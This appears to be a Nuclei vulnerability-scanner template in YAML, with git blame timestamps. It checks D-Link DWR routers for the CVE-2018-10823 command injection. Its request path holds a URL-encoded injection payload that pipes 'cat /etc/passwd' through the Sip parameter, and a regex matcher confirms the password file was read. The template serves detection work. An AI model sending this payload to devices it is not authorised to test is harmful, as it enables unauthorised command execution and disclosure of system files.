nuclei-templates/http/cves/2018/CVE-2018-10823.yaml

40 lines
1.2 KiB
YAML
Raw Normal View History

2021-10-18 12:56:22 +00:00
id: CVE-2018-10823
info:
name: D-Link Routers - Remote Command Injection
2021-10-18 12:56:22 +00:00
author: wisnupramoedya
severity: high
2022-06-20 15:50:55 +00:00
description: |
D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
2021-10-18 12:56:22 +00:00
reference:
- https://www.exploit-db.com/exploits/45676
- https://nvd.nist.gov/vuln/detail/CVE-2018-10823
- https://seclists.org/fulldisclosure/2018/Oct/36
- http://sploit.tech/2018/10/12/D-Link.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2018-10823
cwe-id: CWE-78
tags: cve2018,rce,iot,dlink,router,edb,seclists,cve
metadata:
max-request: 1
2021-10-18 12:56:22 +00:00
http:
2021-10-18 12:56:22 +00:00
- method: GET
path:
- "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-10-18 12:56:22 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/06/19